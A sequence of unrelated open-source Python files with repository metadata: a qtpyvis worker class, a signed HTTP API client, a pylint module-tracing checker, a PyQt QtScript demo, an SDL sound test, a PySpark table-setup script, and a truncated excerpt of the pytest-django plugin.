        # pick up new data), or a prepared and non-busy tool is set.
        return (self.working or
                (self._tool is not None and
                 self._tool.prepared and
                 (not isinstance(self.tool, BusyObservable) or
                  not self.tool.busy)))

    @property
    def working(self) -> bool:
        """Check if this worker is currently working on data.
        """
        return self._next_data is not None

    def work(self, data: Data, **kwargs) -> None:
        """Run a data work loop. This will set the Worker
        into a busy state ("working"), in which new input data
        are worked on until no more new data are provided.
        If new data is given, before the previously provided data
        was done, the previous data will be skipped.
        When working one data item finishes, observers will
        receive a 'work_finished' notification, and can obtain
        the data object including the results via the
        :py:meth:`data` property. The results can be accessed
        as tool specific data attributes.
        The main motivation for this method is to work on data from
        a data loop (like a webcam or a video) in real-time, always
        working on the most recent data available.
        """
        LOG.info("Worker for Tool '%s' (ready=%s, prepared=%s) "
                 "works on data: %r",
                 self.tool and self.tool.key, self.ready,
                 self.tool is not None and self.tool.prepared, data)
        if self.ready and not self.busy:
            # no loop running yet: queue the data and start the loop
            self._next_data = data
            self._work(**kwargs)
        else:
            # a loop is already running (or the worker is busy):
            # just queue the data; the running loop will pick it up
            self._next_data = data
            # FIXME[bug/concept]: additional **kwargs arguments are ignored!

    @busy("working")
    # FIXME[hack/bug]: if queueing is enabled, we are not really busy ...
    # (that is we are busy, but nevertheless accepting more work)
    def _work(self, stepwise: bool = False, **kwargs):
        """The implementation of the work loop. This method
        is assumed to run in a background thread. It will
        check the property `_next_data` for fresh data and
        if present, it will hand (a copy) of this data to the
        detector and otherwise it will end the loop.
        The data object passed to the detector will also
        be stored as attribute (using the unique key of the detector
        as attribute name) in the original data passed to the
        detector. The results of the detector will be stored
        in detector data under the attribute `detections`.
        """
        while self._next_data is not None:
            data = self._next_data
            LOG.info("Working on next data (%r) with Tool %s.",
                     data, self._tool)
            self._data = data
            self.change(data_changed=True)
            with self.failure_manager(catch=True):
                # also record the processing time ('duration' attribute)
                result = self.tool.external_result + ('duration', )
                LOG.debug("Worker %r applying tool %r on data %r "
                          "with result %s.", self, self.tool, data, result)
                if stepwise:
                    for values in self.tool.steps(data, result=result,
                                                  **kwargs):
                        self.tool.add_data_attributes(data, result, values)
                        self.change(work_step=True)
                else:
                    self.tool.apply(data, result=result, **kwargs)
                self.change(work_finished=True)
            if self._next_data is data:
                # no new data arrived while working -> end the loop
                self._next_data = None
            LOG.info("Working on data (%r/%r) with Tool %s finished.",
                     data, self._data, self._tool)

    # FIXME[bug]: In case of an error, we may also cause some Qt error here:
    # QObject::connect: Cannot queue arguments of type 'QTextBlock'
    # (Make sure 'QTextBlock' is registered using qRegisterMetaType().)
    # QObject::connect: Cannot queue arguments of type 'QTextCursor'
    # (Make sure 'QTextCursor' is registered using qRegisterMetaType().)
    # This happens for example when the face panel is shown and a too
    # small image (244x244x3) is causing an error in the 'haar' detector.
    # The source of this messages is not clear to me yet (I have also
    # seen it at other locations ...)

    def _apply_tool(self, data, **kwargs) -> None:
        # NOTE(review): this passes `self` as an extra positional argument,
        # unlike the `self.tool.apply(data, ...)` call in _work() above --
        # confirm against the Tool.apply signature.
        self.tool.apply(self, data, **kwargs)

    #
    # Tool observer
    #

    def tool_changed(self, _tool: Tool, _info: Tool.Change) -> None:
        """React to a change of the :py:class:`Tool` by reworking
        the current :py:class:`Data`.
        """
        if self._data is None:
            return  # nothing to do ...
        # FIXME[todo]: what tool changes would require a recomputation
        # - info.busy_change should not do this ...
        # if info.state_changed
        # if self._data is not None:
        #     self.work(self._data)
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/tool/worker.py",
"copies": "1",
"size": "8068",
"license": "mit",
"hash": 990465609121850400,
"line_mean": 38.7438423645,
"line_max": 78,
"alpha_frac": 0.5941993059,
"autogenerated": false,
"ratio": 4.2196652719665275,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5313864577866527,
"avg_score": null,
"num_lines": null
} |
# Released subject to the BSD License
from functools import wraps
import json
import socket
import six
import apysigner
if six.PY2:
from urllib import urlencode
from urllib2 import HTTPError, urlopen
from urlparse import parse_qs
else:
from urllib.request import urlopen
from urllib.parse import parse_qs, urlencode
from urllib.error import HTTPError
__all__ = (
'api_request',
'SignedAPIRequest',
'BaseResponse',
'JSONApiResponse',
)
class BaseResponse(object):
    """
    Thin wrapper around the response object returned by urlopen,
    existing mainly so the response can easily be extended if desired.

    Note that this is not EXACTLY like a response you'd normally get
    from urlopen and cannot be used as a drop-in replacement for one.
    """
    _content = None

    def __init__(self, response):
        self.original_response = response

    @property
    def code(self):
        """HTTP status code of the wrapped response."""
        return self.original_response.code

    @property
    def is_success(self):
        # RFC 2616: any "2xx" status code indicates that the client's
        # request was successfully received, understood, and accepted.
        return 200 <= self.code < 300

    @property
    def content(self):
        """
        Raw response content, read lazily and cached on first access.
        """
        if self._content is None:
            self._content = self.original_response.read()
        return self._content
class APIRequest(object):
    """
    API method decorator to turn a method into an easy API call.

    Assumes the decorated method's class has "HOST_NAME" defined.  The
    wrapped method returns only the data for the request; this decorator
    urlencodes it and issues the GET or POST to the configured endpoint.
    """
    def __init__(self, endpoint, method="GET", timeout=socket._GLOBAL_DEFAULT_TIMEOUT, response_class=None):
        """
        :param endpoint:
            URL endpoint for request.
        :param method:
            HTTP method for request.
        :param timeout:
            Timeout in seconds.
        :param response_class:
            Response class to wrap response in. If not provided will use standard response from urlopen,
            or standard HTTPError if received.
        """
        self.endpoint = endpoint
        self.method = method
        self.response_class = response_class
        self.TIMEOUT = timeout

    def __call__(self, method):
        """
        Method being wrapped should only return data to be used for
        API call. The api_request takes that data, urlencodes it and
        makes the proper get or post request to the specified endpoint.
        """
        @wraps(method)
        def _inner(cls, *args, **kwargs):
            try:
                method_data = method(cls, *args, **kwargs)
                url, query_data = self._get_url_and_data(method_data, cls)
                response = self._open_url(url, query_data)
            except HTTPError as e:
                # HTTP error responses are still responses; hand them to
                # prepare_response instead of raising.
                response = e
            return self.prepare_response(response, cls)
        return _inner

    def _get_url_and_data(self, method_data, cls):
        """
        Returns url and data ready to make request.

        :param method_data:
            The data returned from the wrapped method call
        :param cls:
            The API class object being decorated.
        """
        url = cls.HOST_NAME + self.endpoint
        query_data = method_data and urlencode(method_data, doseq=1)
        if self.method == "GET" and query_data:
            # GET parameters travel in the query string, not the body.
            url += "?" + query_data
            query_data = None
        return url, query_data

    def _open_url(self, url, query_data):
        """Perform the request.

        BUGFIX: Python 3's ``urlopen`` requires ``bytes`` for POST data;
        passing the urlencoded ``str`` raised a TypeError.  Encode here,
        mirroring ``BaseAPIClient._open_url``.  (On Python 2 encoding the
        ascii urlencoded str is a harmless no-op.)
        """
        if query_data:
            query_data = query_data.encode()
        return urlopen(url, data=query_data, timeout=self.TIMEOUT)

    def prepare_response(self, response, cls):
        """
        Prepares API response for final return.

        :param response:
            The raw response returned from ``urlopen``
        :param cls:
            The API class object being decorated.
        """
        custom_response = self.response_class or getattr(cls, "RESPONSE_CLASS", None)
        if custom_response:
            return custom_response(response)
        else:
            return response

# Lowercase alias so the decorator reads like a function: @api_request(...)
api_request = APIRequest
class SignedURLMixin(object):
    """Mixin that appends a client id and an HMAC signature to request URLs.

    Subclasses supply CLIENT_ID / PRIVATE_KEY; signature generation is
    delegated to ``apysigner.get_signature``.
    """
    CLIENT_PARAM_NAME = 'ClientId'
    SIGNATURE_PARAM_NAME = 'Signature'
    CLIENT_ID = ''
    PRIVATE_KEY = ''

    def _open_url(self, url, query_data):
        """
        Don't sign until last step before opening url.

        BUGFIX: encode the urlencoded payload to ``bytes`` for Python 3's
        ``urlopen`` (the signing above still needs the ``str`` form for
        ``parse_qs``).  Mirrors ``BaseAPIClient._open_url``.
        """
        url = self._get_signed_url(url, query_data)
        if query_data:
            query_data = query_data.encode()
        return urlopen(url, data=query_data, timeout=self.TIMEOUT)

    def _get_signed_url(self, url, query_data):
        # Currently limited to kinds of data that are key=value pairs.
        # Binary data is not supported.
        url_with_client = self._get_url_with_client(url)
        payload = query_data and parse_qs(query_data)
        signature = apysigner.get_signature(self.PRIVATE_KEY, url_with_client, payload)
        return url_with_client + "&{0}={1}".format(self.SIGNATURE_PARAM_NAME, signature)

    def _get_url_with_client(self, url):
        """Return *url* with the client id appended as a query parameter."""
        url_conjunction = "&" if "?" in url else "?"
        return url + "{url_conj}{param_name}={client_id}".format(
            url_conj=url_conjunction,
            param_name=self.CLIENT_PARAM_NAME,
            client_id=self.CLIENT_ID,
        )
class SignedAPIRequest(SignedURLMixin, APIRequest):
    """
    An :class:`APIRequest` decorator whose URLs are signed via
    :class:`SignedURLMixin`.

    Subclass it to bake in your credentials, then use the subclass as the
    decorator::

        class MySignedAPI(SignedAPIRequest):
            CLIENT_ID = "client-id"
            PRIVATE_KEY = "UHJpdmF0ZSBLZXk="

        signed_request = MySignedAPI

        @signed_request('/something/good', method='POST')
        def post_something():
            return {'good_thing': 'babies'}
    """
class BaseAPIClient(object):
    """
    A small, extensible client alternative to the decorator style.

    Subclasses must define "HOST_NAME" and may define "RESPONSE_CLASS".

    USAGE:
        client = BaseClient()
        response = client.fetch_response("/do-something", method="GET", times=5)

    See tests for additional examples
    """
    HOST_NAME = None
    RESPONSE_CLASS = None
    TIMEOUT = socket._GLOBAL_DEFAULT_TIMEOUT

    def _get_url_and_data(self, endpoint, method, data):
        """
        Build the final URL and body payload for a request.

        :param endpoint:
            A string of the url endpoint, joined onto HOST_NAME.
        :param method:
            A string of the HTTP Method to use. (GET/POST)
        :param data:
            A dictionary of data to use with the request
        """
        url = self.HOST_NAME + endpoint
        encoded = data and urlencode(data, doseq=1)
        if method == "GET" and encoded:
            # GET carries its parameters in the query string, not the body.
            return url + "?" + encoded, None
        return url, encoded

    def _open_url(self, url, query_data):
        """Issue the request; the body is encoded to bytes for urlopen."""
        if query_data:
            query_data = query_data.encode()
        return urlopen(url, data=query_data, timeout=self.TIMEOUT)

    def fetch_response(self, endpoint, method="GET", data=None):
        """
        Main method: fetch *endpoint* and return the (possibly wrapped)
        response.  HTTP error responses are returned, not raised.

        :param endpoint:
            The string value of url endpoint, combined with 'HOST_NAME'.
        :param method:
            A string of the HTTP method to use. Must be upper case.
        :param data:
            dictionary of all data items used to make the request.
        """
        try:
            url, query_data = self._get_url_and_data(endpoint, method, data or None)
            response = self._open_url(url, query_data)
        except HTTPError as e:
            response = e
        # Preserve the historical and/or idiom: if the wrapped response is
        # falsy, the raw response is returned instead.
        wrapped = self.RESPONSE_CLASS and self.RESPONSE_CLASS(response)
        return wrapped or response
class BaseSignedAPIClient(SignedURLMixin, BaseAPIClient):
    """
    A :class:`BaseAPIClient` whose request URLs are signed by
    :class:`SignedURLMixin` (client id plus signature appended).
    """
class JSONApiResponse(BaseResponse):
    """
    Response wrapper that parses the body as JSON.

    The caller must still ensure the payload actually is JSON in the
    first place (an HTML error page, for example, makes ``json()`` raise).
    """
    # Parsed-document cache; filled on the first json() call.
    _json = None

    def json(self):
        """Return the decoded JSON document (parsed once, then cached)."""
        if self._json is None:
            body = self.content
            if isinstance(body, bytes):
                body = body.decode("utf-8")
            self._json = json.loads(body)
        return self._json
| {
"repo_name": "madisona/apyclient",
"path": "apyclient.py",
"copies": "1",
"size": "8330",
"license": "bsd-2-clause",
"hash": 4961916930852017000,
"line_mean": 29.2909090909,
"line_max": 108,
"alpha_frac": 0.61272509,
"autogenerated": false,
"ratio": 4.167083541770886,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5279808631770886,
"avg_score": null,
"num_lines": null
} |
"""A pylint checker that simply records what module it's visiting.
This helps diagnose problems with pylint not running on all files.
To use, define an environment variable PYLINT_RECORD_FILES, with a value of
a file name to write them to:
set PYLINT_RECORD_FILES=pylinted_files.txt
"""
import os
from pylint.checkers import BaseChecker
from pylint.interfaces import IAstroidChecker
from .common import BASE_ID, check_visitors
FILENAME = os.environ.get("PYLINT_RECORD_FILES", "")
def register_checkers(linter):
    """Register checkers (only when PYLINT_RECORD_FILES is set)."""
    if not FILENAME:
        return
    linter.register_checker(ModuleTracingChecker(linter))
@check_visitors
class ModuleTracingChecker(BaseChecker):
    """
    Records each module pylint visits by appending its path to FILENAME.

    Not really a checker: it emits no messages. There's probably a better
    way to hook into pylint to do this.
    """
    __implements__ = (IAstroidChecker,)
    name = "module-tracing-checker"
    # pylint requires at least one message definition; this one is never emitted.
    msgs = {("E%d00" % BASE_ID): ("bogus", "bogus", "bogus")}

    def visit_module(self, node):
        """Called for each module being examined; append its file name."""
        with open(FILENAME, "a") as trace_file:
            trace_file.write(node.file + "\n")
| {
"repo_name": "edx/edx-lint",
"path": "edx_lint/pylint/module_trace.py",
"copies": "1",
"size": "1161",
"license": "apache-2.0",
"hash": -5230543545976911000,
"line_mean": 24.2391304348,
"line_max": 77,
"alpha_frac": 0.6838931955,
"autogenerated": false,
"ratio": 3.6624605678233437,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48463537633233433,
"avg_score": null,
"num_lines": null
} |
"""a pyqt test app that embeds javascript using QtScript,
defines qt properties and slots in py, and exposes them to js"""
import sys
from PyQt4 import QtGui, QtCore
from PyQt4.QtScript import QScriptEngine, QScriptValue
from PyQt4.QtCore import QObject, pyqtSignature, pyqtProperty, QVariant, QTimer
# Interactive-prompt strings, mimicking the Python REPL.
ps1 = ">>> "
ps2 = "... "
def printhello():
    """Slot target for the button click (Python 2 print statement)."""
    print "Hello."
app = QtGui.QApplication(sys.argv)
window = QtGui.QWidget()
# Create our main window using a plain QWidget.
window.setWindowTitle("Signals")
# Set our window's title as "Signals".
button = QtGui.QPushButton("Press", window)
# Create, with "Press" as its caption,
# a child button in the window.
# By specifying a parent object,
# this new widget is automatically added to the same.
button.resize(200, 40)
# Resize our button to (200, 40) -> (X, Y)
"""old style signals, works in pyqt 4.4"""
#button.connect(button, QtCore.SIGNAL("clicked()"), printhello) #QtCore.SLOT("quit()"))
# New-style signals arrived in PyQt 4.5; must upgrade to get these.
button.clicked.connect(printhello)
# Connect the button's click signal to our printhello handler
# (NOT to QApplication.quit(), despite the old commented-out line above).
window.show()
# Show our window.
class Python(QObject):
    """QObject exposing a slot, a qt property and a child QTimer,
    intended to be handed to the QtScript engine as a global."""
    def __init__(self):
        QObject.__init__(self)
        self.setObjectName("python")
        # Does not work as expected :(
        self.setProperty("app", QVariant(self))
        # Child QTimer, discoverable from JS via its object name.
        self.t = QTimer(self)
        self.t.setObjectName("timer")
    @pyqtSignature("QString")
    def hello(self, name):
        """Slot callable from JavaScript: print a greeting for *name*."""
        print "Hello,", name
    def get_test(self):
        # Getter backing the read-only 'test' property declared below.
        return 123
    test = pyqtProperty("int", get_test)
engine = QScriptEngine()
# Convenience JS helper: dir(obj) prints an object's property names.
engine.evaluate("function dir(obj) { for(o in obj) print(o); }")
py = Python()
spy = engine.newQObject(py)
# Expose the Python() QObject to scripts as the global 'python'.
engine.globalObject().setProperty("python", spy)
#app.exec_()
print "Ctrl+D to quit"
# Simple REPL: accumulate lines until the engine says the snippet is a
# complete statement, then evaluate it.
prompt = ps1
code = ""
while True:
    # Keep the Qt GUI responsive while blocking on console input.
    app.processEvents()
    line = raw_input(prompt)
    if not line.strip():
        continue
    code = code + line + "\n"
    if engine.canEvaluate(code):
        result = engine.evaluate(code)
        if engine.hasUncaughtException():
            bt = engine.uncaughtExceptionBacktrace()
            print "Traceback:"
            print "\n".join([" %s" % l for l in list(bt)])
            print engine.uncaughtException().toString()
        else:
            print result.toString()
        code = ""
        prompt = ps1
    else:
        # Incomplete statement: keep reading with the continuation prompt.
        prompt = ps2
| {
"repo_name": "antont/tundra",
"path": "src/Application/JavascriptModule/proto/qtscript_test.py",
"copies": "1",
"size": "2402",
"license": "apache-2.0",
"hash": -7739511824187191000,
"line_mean": 26.6091954023,
"line_max": 87,
"alpha_frac": 0.6523730225,
"autogenerated": false,
"ratio": 3.5904334828101643,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9725404770491666,
"avg_score": 0.0034803469636996267,
"num_lines": 87
} |
# A PySDL port of some C++ code I found linked to in a couple of
# places. The original website is down, but it's available on the
# Wayback Machine here:
# https://web.archive.org/web/20120313055436/http://www.dgames.org/beep-sound-with-sdl/
# Unfortunately, I couldn't find the name of the author. He didn't
# have it on his website, and I can't download the original source
# file, so I don't know if he put it in there.
# The original transcription of the code to Python and ctypes didn't
# immediately work, but with tweaking it was the first time I managed
# to get generated sound to work.
import math
from sdl2 import *
from ctypes import *
AMPLITUDE = 128
FREQUENCY = 44100
CHANNELS = 2
class BeepObject():
    """One queued tone: a frequency in Hz plus the number of audio
    samples still to be rendered (decremented by the audio callback)."""

    def __init__(self, freq, samplesLeft):
        self.samplesLeft = samplesLeft
        self.freq = freq
class Beeper():
    """Queue of tones rendered through an SDL audio callback."""
    def __init__(self):
        # Phase accumulator for the sine oscillator.
        self.v = 0
        # Pending BeepObjects; beep() inserts at index 0 and the callback
        # consumes from the end, so the list behaves as a FIFO.
        self.beeps = []
        # NOTE(review): ac_func (the ctypes callback wrapper) is only
        # referenced via the spec struct — confirm it stays alive for as
        # long as SDL holds the function pointer.
        ac_func = SDL_AudioCallback(self.audio_callback)
        self.spec = SDL_AudioSpec(freq=FREQUENCY,
                                  aformat=AUDIO_S8,
                                  channels=CHANNELS,
                                  samples=4096,
                                  callback=ac_func)
    def beep(self, freq, duration):
        """Queue a tone of *freq* Hz lasting *duration* milliseconds."""
        bo = BeepObject(freq, int(duration * (FREQUENCY / 1000)))
        # Lock out the audio callback while mutating the shared queue.
        SDL_LockAudio()
        self.beeps.insert(0, bo)
        SDL_UnlockAudio()
    def wait(self):
        """Block (polling every 20 ms) until all queued beeps are played."""
        while True:
            SDL_Delay(20)
            SDL_LockAudio()
            size = len(self.beeps)
            SDL_UnlockAudio()
            if not size > 0:
                break
    def audio_callback(self, userdata, stream, length):
        """SDL audio callback: fill *stream* with audio samples.

        NOTE(review): *length* is in bytes; dividing by CHANNELS yields
        the per-channel sample count (1 byte/sample with AUDIO_S8) —
        confirm against the SDL_AudioSpec above.
        """
        i = 0
        length = int(length / CHANNELS)
        while i < length:
            if not self.beeps:
                # No tones queued: fill the rest of the buffer with silence.
                for i in range(length):
                    for c in range(CHANNELS):
                        stream[i*CHANNELS+c] = c_ubyte(0)
                return
            # Render the oldest queued beep (end of the list).
            bo = self.beeps[-1]
            samplesToDo = min(i + bo.samplesLeft, length);
            bo.samplesLeft -= samplesToDo - i
            while i < samplesToDo:
                # Sine sample at the current oscillator phase, duplicated
                # onto every channel.
                sample = int(AMPLITUDE * math.sin(self.v * 2 * math.pi / FREQUENCY))
                for c in range(CHANNELS):
                    stream[i*CHANNELS+c] = c_ubyte(sample)
                i += 1
                self.v += bo.freq
            if bo.samplesLeft == 0:
                self.beeps.pop()
if __name__ == '__main__':
    if SDL_Init(SDL_INIT_AUDIO) != 0:
        raise RuntimeError("Cannot initialize audio system: {}".format(SDL_GetError()))
    # Note length in milliseconds.
    duration = 50
    # Pitch frequencies in Hz (lowercase names are the upper octave).
    D = 293.665
    E = 329.628
    F = 349.228
    G = 391.995
    A = 440.000
    B = 493.883
    c = 554.365
    d = 587.330
    b = Beeper()
    # Open the default output device using the Beeper's callback spec.
    devid = SDL_OpenAudioDevice(None, 0, b.spec, b.spec, 0)
    # Queue the whole melody before unpausing playback.
    b.beep(G, duration)
    b.beep(G, duration)
    b.beep(A, duration)
    b.beep(A, duration)
    b.beep(B, duration)
    b.beep(A, duration)
    b.beep(G, duration)
    b.beep(F, duration)
    b.beep(A, duration)
    b.beep(G, duration)
    b.beep(F, duration)
    b.beep(G, duration)
    b.beep(G, duration)
    b.beep(G, duration)
    b.beep(A, duration)
    b.beep(A, duration)
    b.beep(B, duration)
    b.beep(A, duration)
    b.beep(G, duration)
    b.beep(F, duration)
    # Unpause the device so the callback starts draining the queue.
    SDL_PauseAudioDevice(devid, 0)
    b.wait()
    SDL_CloseAudioDevice(devid)
SDL_Quit(SDL_INIT_AUDIO) | {
"repo_name": "MageJohn/CHIP8",
"path": "soundtests/sdl_soundtest.py",
"copies": "1",
"size": "3434",
"license": "mit",
"hash": -2191670305280312000,
"line_mean": 25.4230769231,
"line_max": 87,
"alpha_frac": 0.5521258008,
"autogenerated": false,
"ratio": 3.4169154228855723,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.44690412236855726,
"avg_score": null,
"num_lines": null
} |
"""A PySpark driver that creates Spark tables for Spark SQL benchmark.
It takes an HCFS directory and a list of the names of the subdirectories of that
root directory. The subdirectories each hold Parquet data and are to be
converted into a table of the same name. The subdirectories are explicitly
providing because listing HCFS directories in PySpark is ugly.
sys.argv[1]: The root HCFS directory
sys.argv[2]: A comma separated list of the subdirectories/table names
"""
import argparse
import logging
import os
from pyspark.sql import SparkSession
from pyspark.sql.utils import AnalysisException
def main():
    """Create one Spark SQL table per named Parquet subdirectory.

    Command line: root_dir (HCFS path) and a comma separated list of
    subdirectory/table names.  For each table the previous definition is
    dropped, the Parquet directory is registered, partitions are repaired
    when applicable, and column statistics are computed.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('root_dir')
    arg_parser.add_argument('tables', type=lambda csv: csv.split(','))
    cli_args = arg_parser.parse_args()

    builder = SparkSession.builder.appName('Setup Spark tables')
    spark = builder.enableHiveSupport().getOrCreate()

    for table_name in cli_args.tables:
        logging.info('Creating table %s', table_name)
        data_dir = os.path.join(cli_args.root_dir, table_name)
        # Drop any stale definition left over from a previous run.
        spark.sql('DROP TABLE IF EXISTS ' + table_name)
        # Register the Parquet directory as a new table.
        spark.catalog.createTable(table_name, data_dir, source='parquet')
        try:
            # Loads the partitions under the table if it is partitioned.
            spark.sql('MSCK REPAIR TABLE ' + table_name)
        except AnalysisException:
            # The table was not partitioned, which was presumably expected.
            pass
        # Compute column statistics. Spark persists them in the TBL_PARAMS
        # table of the Hive Metastore; this does not interoperate with
        # Hive's own statistics. See
        # https://jaceklaskowski.gitbooks.io/mastering-spark-sql/content/spark-sql-LogicalPlan-AnalyzeColumnCommand.html
        column_csv = ','.join(spark.table(table_name).columns)
        spark.sql(
            'ANALYZE TABLE {} COMPUTE STATISTICS FOR COLUMNS {}'.format(
                table_name, column_csv))


if __name__ == '__main__':
    main()
| {
"repo_name": "GoogleCloudPlatform/PerfKitBenchmarker",
"path": "perfkitbenchmarker/scripts/spark_sql_test_scripts/spark_table.py",
"copies": "1",
"size": "1944",
"license": "apache-2.0",
"hash": -2075883749000230700,
"line_mean": 37.1176470588,
"line_max": 116,
"alpha_frac": 0.7139917695,
"autogenerated": false,
"ratio": 3.9592668024439917,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5173258571943992,
"avg_score": null,
"num_lines": null
} |
"""A py.test plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtues.
"""
import os
import sys
import pytest
from .django_compat import is_django_unittest
from .fixtures import (_django_db_setup, db, transactional_db, client,
admin_client, rf, settings, live_server,
_live_server_helper)
from .lazy_django import skip_if_no_django, django_settings_is_configured
(_django_db_setup, db, transactional_db, client, admin_client, rf,
settings, live_server, _live_server_helper)
SETTINGS_MODULE_ENV = 'DJANGO_SETTINGS_MODULE'
CONFIGURATION_ENV = 'DJANGO_CONFIGURATION'
################ pytest hooks ################
def pytest_addoption(parser):
    """Register pytest-django's command line options and ini settings."""
    group = parser.getgroup('django')
    group._addoption('--reuse-db',
                     action='store_true', dest='reuse_db', default=False,
                     help='Re-use the testing database if it already exists, '
                          'and do not remove it when the test finishes. This '
                          'option will be ignored when --no-db is given.')
    group._addoption('--create-db',
                     action='store_true', dest='create_db', default=False,
                     help='Re-create the database, even if it exists. This '
                          'option will be ignored if not --reuse-db is given.')
    group._addoption('--ds',
                     action='store', type='string', dest='ds', default=None,
                     help='Set DJANGO_SETTINGS_MODULE.')
    group._addoption('--dc',
                     action='store', type='string', dest='dc', default=None,
                     help='Set DJANGO_CONFIGURATION.')
    parser.addini(CONFIGURATION_ENV,
                  'django-configurations class to use by pytest-django.')
    group._addoption('--liveserver', default=None,
                     help='Address and port for the live_server fixture.')
    parser.addini(SETTINGS_MODULE_ENV,
                  'Django settings module to use by pytest-django.')
def _load_settings(config, options):
    """Resolve and export the Django settings environment variables.

    Both DJANGO_SETTINGS_MODULE and DJANGO_CONFIGURATION are resolved in
    priority order: command line option, then pytest ini value, then a
    pre-existing environment variable.  When a configuration class is
    selected, the django-configurations importer is installed.  Settings
    are then imported eagerly so a broken settings module fails fast with
    a UsageError.
    """
    # Configure DJANGO_SETTINGS_MODULE
    ds = (options.ds or
          config.getini(SETTINGS_MODULE_ENV) or
          os.environ.get(SETTINGS_MODULE_ENV))

    # Configure DJANGO_CONFIGURATION
    dc = (options.dc or
          config.getini(CONFIGURATION_ENV) or
          os.environ.get(CONFIGURATION_ENV))

    if ds:
        os.environ[SETTINGS_MODULE_ENV] = ds

        if dc:
            os.environ[CONFIGURATION_ENV] = dc

            # Install the django-configurations importer
            import configurations.importer
            configurations.importer.install()

        from django.conf import settings
        try:
            # Touch DATABASES to force the settings module to import now.
            settings.DATABASES
        except ImportError as e:
            # `except ... as e` replaces the legacy sys.exc_info() dance;
            # it works on every Python version this plugin supports.
            raise pytest.UsageError(*e.args)
# BUGFIX: the original gate compared version *strings* ('2.10' < '2.4'
# lexicographically), so this hook was wrongly skipped on pytest >= 2.10.
# Compare numeric (major, minor) components instead.
_PYTEST_VERSION_INFO = tuple(
    int(part) for part in pytest.__version__.split('.')[:2] if part.isdigit())

if _PYTEST_VERSION_INFO >= (2, 4):
    def pytest_load_initial_conftests(early_config, parser, args):
        """Load Django settings before conftests are collected (pytest >= 2.4)."""
        _load_settings(early_config, parser.parse_known_args(args))
def pytest_configure(config):
    """Register pytest-django markers; load settings eagerly on old pytest.

    On pytest < 2.4 the pytest_load_initial_conftests hook does not exist,
    so the Django settings are loaded here instead.
    """
    # Register the marks
    config.addinivalue_line(
        'markers',
        'django_db(transaction=False): Mark the test as using '
        'the django test database. The *transaction* argument marks will '
        "allow you to use real transactions in the test like Django's "
        'TransactionTestCase.')
    config.addinivalue_line(
        'markers',
        'urls(modstr): Use a different URLconf for this test, similar to '
        'the `urls` attribute of Django `TestCase` objects. *modstr* is '
        'a string specifying the module of a URL config, e.g. '
        '"my_app.test_urls".')

    # BUGFIX: the old check compared version strings ('2.10' < '2.4'
    # lexicographically), misfiring for pytest >= 2.10.  Compare numeric
    # (major, minor) components instead.
    version_info = tuple(
        int(part) for part in pytest.__version__.split('.')[:2]
        if part.isdigit())
    if version_info < (2, 4):
        _load_settings(config, config.option)
################ Autouse fixtures ################
@pytest.fixture(autouse=True, scope='session')
def _django_test_environment(request):
    """
    Ensure that Django is loaded and has its testing environment setup

    XXX It is a little dodgy that this is an autouse fixture. Perhaps
    an email fixture should be requested in order to be able to
    use the Django email machinery just like you need to request a
    db fixture for access to the Django database, etc. But
    without duplicating a lot more of Django's test support code
    we need to follow this model.
    """
    if django_settings_is_configured():
        from django.conf import settings
        from .compat import (setup, setup_test_environment,
                             teardown_test_environment)
        # DEBUG is forced off for tests, matching Django's own test runner.
        settings.DEBUG = False
        setup()
        setup_test_environment()
        request.addfinalizer(teardown_test_environment)
@pytest.fixture(autouse=True, scope='session')
def _django_cursor_wrapper(request):
    """The django cursor wrapper, internal to pytest-django

    This will globally disable all database access. The object
    returned has a .enable() and a .disable() method which can be used
    to temporarily enable database access.
    """
    if django_settings_is_configured():
        # util -> utils rename in Django 1.7
        try:
            import django.db.backends.utils
            utils_module = django.db.backends.utils
        except ImportError:
            import django.db.backends.util
            utils_module = django.db.backends.util
        manager = CursorManager(utils_module)
        # Block DB access by default; tests opt in via the django_db marker.
        manager.disable()
    else:
        # No Django settings configured: hand back a no-op manager.
        manager = CursorManager()
    return manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
    """Implement the django_db marker, internal to pytest-django

    This will dynamically request the ``db`` or ``transactional_db``
    fixtures as required by the django_db marker.
    """
    marker = request.keywords.get('django_db', None)
    if marker:
        validate_django_db(marker)
        # transaction=True selects the TransactionTestCase-style database.
        if marker.transaction:
            request.getfuncargvalue('transactional_db')
        else:
            request.getfuncargvalue('db')
@pytest.fixture(autouse=True)
def _django_setup_unittest(request, _django_cursor_wrapper):
    """Setup a django unittest, internal to pytest-django"""
    if django_settings_is_configured() and is_django_unittest(request.node):
        # Django TestCase subclasses always get environment, database and
        # cursor access without needing the django_db marker.
        request.getfuncargvalue('_django_test_environment')
        request.getfuncargvalue('_django_db_setup')
        _django_cursor_wrapper.enable()
        request.addfinalizer(_django_cursor_wrapper.disable)
@pytest.fixture(autouse=True, scope='function')
def _django_clear_outbox(request):
    """Clear the django outbox, internal to pytest-django"""
    if django_settings_is_configured():
        from django.core import mail
        # Each test starts with an empty sent-mail list.
        mail.outbox = []
@pytest.fixture(autouse=True, scope='function')
def _django_set_urlconf(request):
    """Apply the @pytest.mark.urls marker, internal to pytest-django"""
    marker = request.keywords.get('urls', None)
    if marker:
        skip_if_no_django()
        import django.conf
        from django.core.urlresolvers import clear_url_caches
        validate_urls(marker)
        original_urlconf = django.conf.settings.ROOT_URLCONF
        django.conf.settings.ROOT_URLCONF = marker.urls
        # Cached resolvers still point at the old URLconf; flush them.
        clear_url_caches()
        def restore():
            # NOTE(review): caches are not cleared again on restore —
            # confirm this is intended.
            django.conf.settings.ROOT_URLCONF = original_urlconf
        request.addfinalizer(restore)
################ Helper Functions ################
class CursorManager(object):
    """Manager for django.db.backends.util.CursorWrapper

    This is the object returned by _django_cursor_wrapper.  Constructed
    with ``None`` as the util module it is a complete no-op; otherwise it
    can swap the module's CursorWrapper for a failing stub to block
    database access.
    """
    def __init__(self, dbutil=None):
